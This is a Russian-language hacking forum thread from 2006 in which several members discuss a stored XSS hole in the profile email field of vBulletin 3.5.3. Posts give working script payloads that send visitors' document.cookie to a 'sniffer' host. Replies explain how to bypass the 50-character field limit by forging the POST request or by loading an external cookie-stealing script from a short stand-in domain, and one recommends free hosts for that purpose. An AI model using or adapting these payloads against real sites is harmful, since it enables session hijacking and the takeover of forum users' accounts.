HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу vBulletin 3.5.3. Вопрос по XSS в поле email
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

vBulletin 3.5.3. Вопрос по XSS в поле email
  #1  
Старый 08.09.2006, 16:42
r0
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
С нами: 10955906

Репутация: 488
Smile vBulletin 3.5.3. Вопрос по XSS в поле email
В этой версии форума в поле mail в профиле, можно провести xss

Цитата:
mail@mail.com”><script>img = new Image(); img.src = "http://сниффер/картинка.jpg?"+document.cookie;</script>.nomatt
Вот, но поле для ввода ограничено 50ти символами, эм.. возникает вопрос: как быть тогда? +)
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 08.09.2006, 17:05
D=P=CH= MOD=
Постоянный
Регистрация: 15.08.2006
Сообщений: 404
С нами: 10388546

Репутация: 641
По умолчанию
Наверное тогда никак - скрипт если тока уменьшить, но кажись это не реал...
Для того и есть эти ограничения)
 
Ответить с цитированием

  #3  
Старый 08.09.2006, 17:12
r0
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
С нами: 10955906

Репутация: 488
По умолчанию
В том то и дело) как тестилось-то? на локалхосте? зачем тогда xss? просто, чтобы признать ее существование?
 
Ответить с цитированием

  #4  
Старый 08.09.2006, 19:04
wsr
Новичок
Регистрация: 20.04.2005
Сообщений: 9
С нами: 11082306

Репутация: 0
По умолчанию
Все гораздо проще, формируете ПОСТ запрос и туда подставляете все что нужно вместо поля e-mail. Все ограничения сразу же отпадают. У меня все работает без проблем.
 
Ответить с цитированием

  #5  
Старый 09.09.2006, 12:54
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию
yaa@mail.ru”<script>src=http://aa.bab.ru/x.js?<b> Хехе 49 символов. Если удасться такой короткий url найти для сайта.))) А в x.js img = new Image(); img.src = "http://сниффер/картинка.jpg?"+document.cookie;

Может сработает, а может и нет. ))
__________________
Full DNS report
 
Ответить с цитированием

  #6  
Старый 09.09.2006, 16:00
r0
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
С нами: 10955906

Репутация: 488
По умолчанию
спасибо за идею)
 
Ответить с цитированием

  #7  
Старый 09.09.2006, 18:41
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
С нами: 10441826

Репутация: 1686


По умолчанию
под такой пример подойдет фришный хост на холме у них там h10.ru и h7.ru вместо лонига 2-3 символа
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.